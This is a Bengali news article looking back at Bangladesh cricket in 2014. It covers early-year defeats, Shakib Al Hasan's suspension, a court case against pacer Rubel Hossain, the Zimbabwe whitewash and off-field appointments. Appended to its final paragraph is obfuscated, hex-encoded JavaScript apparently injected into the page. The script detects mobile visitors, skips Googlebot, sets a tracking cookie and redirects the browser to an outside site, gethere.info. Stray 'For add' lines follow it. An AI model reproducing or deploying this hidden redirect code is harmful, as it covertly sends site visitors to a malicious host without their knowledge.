for Add
: ৩১ ডিসেম্বর ২০১৪, বুধবার, ২১:৩৫:৪২
নিজস্ব প্রতিবেদক : দেখতে দেখতে হারিয়ে গেলো আরও একটি বছর। সুখ-দু:ক্ষ, সফলতা-ব্যর্থতার পাশাপাশি ক্রিকেটাঙ্গনের কিছু বিতর্ক এখন স্থান করে নিলো ইতিহাসের পাতায়। এবার নতুন সূর্য উঠার পালা, নতুন করে পথ চলা। নতুন বছরের থাকবে নতুন প্রতিশ্রুতি। সে তো ২০১৫ সালের কথা। তার আগে ২০১৪ সালের প্রাপ্তি-অপ্রাপ্তির হিসাবের একটি ফিরিস্তি না করলেই নয়।
কুসংস্কারে যারা বিশ্বাসী, জোড় সংখ্যাগুলোর উপর তাদের অগাধ বিশ্বাস। প্রত্যাশার সঙ্গে প্রাপ্তির একটা যোগসাজস দেখতে চান তারা। কিন্তু সেটা কি মিলেছে ২০১৪ সালে? বছরের সিংহভাগ জুড়েই ছিলো হতাশার চিত্র। ফেব্রুয়ারীতে শ্রীলঙ্কা সিরিজের ব্যর্থতা দিয়ে শুরু। এশিয়া কাপে চরম ব্যর্থতা,আফগানিস্তানের কাছে পরাস্ত হয় বাংলাদেশ ক্রিকেট দল। ওয়েস্ট ইন্ডিজ সফরেও ছিলো ব্যর্থতার মিছিল। এরপর টি-টোয়েন্টি বিশ্বকাপেও মাঠের ক্রিকেট পারেনি প্রত্যাশিত সাফল্য বয়ে আনতে। দেশজুড়ে ক্রিকেটারদের দিকে ছিলো সমালোচনার তীর। এটি আরো বেগবান হয়ে উঠে সাকিব বিতর্কে। বিশ্বসেরা অল রাউন্ডার হয়েও সাকিবের অশোভনীয় আচরন ছিলো দৃষ্টিকটু। এতে বিসিবি’র কঠোরতা ছিলো প্রশংসনীয়, সাকিবকে শাস্তি প্রদান স্বরুপ জরিমানা ও তার উপর নিষেধাজ্ঞা জারি করা। এ সবই ক্রিকেট ভক্তদের হৃদয় থেকে মুছে ফেলতে সাহায্য করেছে বছরের শেষ প্রান্তের সফলতা। জিম্বাবুয়েকে হোয়াইট ওয়াশ করার মধ্য দিয়ে বাংলাদেশ ক্রিকেট দল আবারো ফিরে আসে আস্থার জায়গায়। যা কিনা তাদের ২০১৫ বিশ্বকাপে ভালো কিছু করার স্বপ্ন জোগাবে।
মাঠের ক্রিকেটের বাহিরে সাকিব বিতর্ক ছাড়াও ক্রিকেট পাড়ায় যা এখনো চায়ের কাপে ঝড় তুলছে তা হচ্ছে জাতীয় দলের পেসার রুবেল হোসেনের বিরুদ্ধে আনা চিত্র নায়িকা নাজনীন আক্তার হ্যাপীর প্রতারনার অভিযোগ। বিয়ের করার প্রলোভন দেখিয়ে এক বছরের প্রেম ও জোর পূর্বক দৈহিক সম্পর্কের অভিযোগ তুলে মামলা টুকে দেন হ্যাপী। বিষয়টি রুবেল অস্বীকার করলেও এর সুরাহা হয়নি; তা আদালতে বিচারাধীন। তবে দু’পক্ষের নমুনা পরীক্ষার জন্য ইতিমধ্যে আদালত থেকে নির্দেশ দেয়া হয়েছে। বিসিবি রুবেল বিষয়টি নিয়ে এখনো পর্যন্ত মুখ খুলেনি। তবে এই একটি কারনে তার বিশ্বকাপ মিশন এখানেই শেষ হয়ে যাওয়ার সম্ভাবনা দেখা দিয়েছে। যদি তাই হয় রুবেলকে অনেক বড় শাস্তির মুখে পড়তে হবে।
এছাড়াও ক্রিকেটের আরো কিছু ঘটনা ছিলো ছিলো লক্ষণীয়। বাংলাদেশের কোন ব্যক্তি প্রথমবারের মতো আর্ন্তজাতিক ক্রিকেট কাউন্সিল (আইসিসি) সভাপতি নির্বাচিত হন। বাংলাদেশ সরকারের পরিকল্পনামন্ত্রী আহম মোস্তফা কামাল গত ২৬ জুন এই পদে অধিষ্ঠিত হন। জাতীয় দলের অধিনায়ক মুশফিকুর রহিম শুরু করেন জীবনের নতুন ইনিংস। জাতীয় দলের আরেক ক্রিকেটার মাহমুদ উল্লাহ রিয়াদের শালিকার সঙ্গে তিনি গত ২৬ সেপ্টেম্বর বিয়ে বন্ধনে আবদ্ধ হন। একই মাসে বিসিবি’র সহ সভাপতি নির্বাচিত হন মাহাবুব আনাম। বিদায় বছরে প্রথমবারের মতো টেস্ট এবং ওয়ান ডে অধিনায়ক আলাদা ভাবে ঘোষনা করে বিসিবি। বিপিএলে ম্যাচ ফিক্সিংয়ে অভিযুক্ত আশরাফুল আর্ন্তজাতিক ক্রিকেট আদালতের কাছে তার উপর থেকে শাস্তি কমানোর আবেদন এনে সাড়া পান। এরই প্রেক্ষিতে আগামী ২০১৬ সালে তাকে আবারো ব্যাট-বল হাতে দেখা যেতে পারে। তার আগে অক্টোবর মাসে ঢাকার একটি ক্লাব লিজৈন্ডস অব রূপগঞ্জের আত্মপ্রকাশ অনুষ্ঠানে শচীনের উপস্থিতি বেশ সাড়া পড়েছে ক্রিকেটাঙ্গনে।var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
For add
For add
For add
For add
for Add